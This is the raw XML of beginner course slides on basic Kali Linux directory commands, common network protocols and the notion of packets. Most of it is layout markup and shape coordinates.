              <a:rPr sz="2400" spc="-9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sz="2400" spc="-7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know</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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how</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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things</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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work</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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sz="2400" spc="-7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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>them</a:t>
            </a:r>
            <a:endParaRPr sz="24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0047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2"/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8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9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2</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 3"/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11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12" name="object 3"/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13" name="object 4"/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/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6" name="object 7"/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17" name="object 9"/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8" name="object 10"/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2</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600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1.2 All Kali Linux commands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85140" y="1706880"/>
            <a:ext cx="2515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cd (change directory) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  cd file name    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33600" y="219075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21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3632200" y="1962150"/>
            <a:ext cx="1520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open the file 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609600" y="233045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cd ..   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105660" y="257175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 Box 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2419350"/>
            <a:ext cx="1520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back to file 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609600" y="272415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cd   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05660" y="292989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Text Box 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="2800350"/>
            <a:ext cx="1520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exit all file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112FD5E2-3C37-D658-F7A9-43B35E2646CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="4799838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4C1392E-2628-2E82-5F2E-0C6C9EAB48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276" y="114045"/>
            <a:ext cx="7936052" cy="818515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2.1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Protocols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8A368F76-64CB-EF64-83BD-8E14DEB8D9B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06B176C-9AEF-3139-0D4A-F54E695266B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20</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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C452F4FB-EA27-F1C9-1A11-AFF58DAA81EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410667" y="1812163"/>
            <a:ext cx="747585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017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computer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network,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machines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talk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each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other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by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means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protocols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These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ensure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different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computers,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using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different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hardware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software,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communicate.</a:t>
            </a:r>
            <a:endParaRPr sz="24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88772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C5AFD8A0-1616-4A71-91CC-3E6ABC6F1D3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="4799838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E3ABF06-B3AE-C203-8076-D07CAC9B60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276" y="114045"/>
            <a:ext cx="7936052" cy="818515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2.1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Protocols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8D76EBBD-D222-F75F-2AE7-A0DDF265717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DB2251E0-F788-3BF1-989A-55C5F570500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21</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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2978AE6A-1F7D-C13C-259A-D56237AD0E42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410666" y="1812163"/>
            <a:ext cx="8194853" cy="2844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13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There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large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variety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networking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protocols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Internet,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each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with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own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purpose.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-JO"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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Open a website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>   use HTTP protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Download files, websites or email          use TCP protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Data transfer via live broadcast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>      use UDP protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Remote server management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>         use SSH protocol</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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194A235-B5FD-563D-6FB4-58333FBD9918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2864433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29E74B2-50E4-5306-F7DD-4A91657CC999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102919" y="340995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4C7D896-6137-DBA3-CFEA-B5A9416B55EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="394335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6D45A24-0FFB-A24B-5699-0F1FBC20C9F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4305300" y="4442398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861A90C3-F6CE-7346-4474-1A98296AB785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="4799838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C071B85-7BB2-8D63-52EC-14ECC94ECA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276" y="114045"/>
            <a:ext cx="7936052" cy="818515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2.1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Protocols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C960372A-0ABB-492E-481F-504E97E05D1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4AF95125-94F5-DC2F-049A-C6799F7BE1A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22</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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0FB41D6E-6211-F277-AF7F-322E79A82D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207873" y="1578512"/>
            <a:ext cx="8194853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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Connected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>   use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Send and receive email          use SMTP protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Transfer data between nearby devices         use Bluetooth protocol</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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A92C55C-6F8C-B222-D092-F316BFBD764C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="180975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FFFEECB-B654-39D8-6431-E69D6163282D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="226695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1755EEE-F6DC-793D-B942-15955D086805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455285" y="287655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37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3C541285-EE59-358F-F115-6B1DE5EB8AC8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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7139A116-80F6-99E2-B148-168777F9156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D487584C-5902-13F8-AF77-9609B02B482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23</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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88A4A392-0933-4240-6C9E-125D4A6EB6A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks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5400" spc="-10" dirty="0"/>
              <a:t>Packets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40004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4A46CA5A-11BC-7547-4455-7DBFDD77A350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="4799838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5711807-EF3D-AADB-125F-B343E7ED5E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276" y="114045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2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Packets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8BCFD350-2237-2A05-E99D-249925F5A3C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0D479E9-D93D-2D6C-E8D9-A6FCF1696FB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24</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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C9AEEF4F-CC4B-874F-EBAF-46843920D0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410667" y="1124458"/>
            <a:ext cx="7726045" cy="334517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206375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primary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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goal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networking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2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exchange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information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between</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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networked</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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computers;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this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information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carried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by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>packets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2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2200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="337820">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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Packets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nothing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but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streams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bits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running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electric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signals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physical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media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data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transmission.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Such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media</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200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2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be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wire</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1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LAN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b="1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air</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1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2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WiFi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 network.</a:t>
            </a:r>
            <a:endParaRPr sz="22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2200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2510"/>
              </a:lnSpc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These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electrical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signals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then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interpreted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bits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(zeros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endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2510"/>
              </a:lnSpc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ones)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make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up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information.</a:t>
            </a:r>
            <a:endParaRPr sz="22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42202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C1EF4E6-FD4F-43DA-3325-275BE16ABD78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="4799838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50E3C75-D959-0111-B8DA-134D80D7B3E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="254888"/>
            <a:ext cx="230251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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1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2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Packets</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robo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0B88B74-ABA0-6BA0-7543-F14125753EEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410667" y="2251075"/>
            <a:ext cx="35534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Every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every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has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following structure.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F0512033-5825-08A6-2B87-840871F6E67E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4256532" y="1632204"/>
            <a:ext cx="4241800" cy="806450"/>
            <a:chOff x="4256532" y="1632204"/>
            <a:chExt cx="4241800" cy="806450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DFED4B88-9A34-5178-CC4F-6B9FAD08A204}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269486" y="1645158"/>
              <a:ext cx="4215765" cy="780415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4215765" h="780414">
                  <a:moveTo>
                    <a:pt x="4137406" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4137406" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413740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278B45BC-CEE4-7EBB-1B43-8033174C94E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269486" y="1645158"/>
              <a:ext cx="4215765" cy="780415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4215765" h="780414">
                  <a:moveTo>
                    <a:pt x="0" y="77977"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4137406" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4137406" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977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8A3119EC-D521-E2DE-098D-09BD3F6275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23635" y="1712213"/>
            <a:ext cx="13081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1" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F1D4F2-419A-F1AD-45BB-0C0BC074CFDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4261103" y="2485644"/>
            <a:ext cx="4232275" cy="1689100"/>
            <a:chOff x="4261103" y="2485644"/>
            <a:chExt cx="4232275" cy="1689100"/>
          </a:xfrm>
        </p:grpSpPr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69FF4BBF-B099-5A15-02A4-54BBFAE102A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4274057" y="2498598"/>
              <a:ext cx="4206240" cy="1663064"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4206240" h="1663064">
                  <a:moveTo>
                    <a:pt x="4039996" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="166242" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5937" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="166243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5937" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166242" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4039996" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="166243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403999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D8EBD5C-E2F4-260E-65F5-3D8E3A2A260D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4274057" y="2498598"/>
              <a:ext cx="4206240" cy="1663064"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4206240" h="1663064">
                  <a:moveTo>
                    <a:pt x="0" y="166243"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5937" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166242" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4039996" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="166243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4039996" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166242" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5937" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="166243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2">
            <a:extLst>
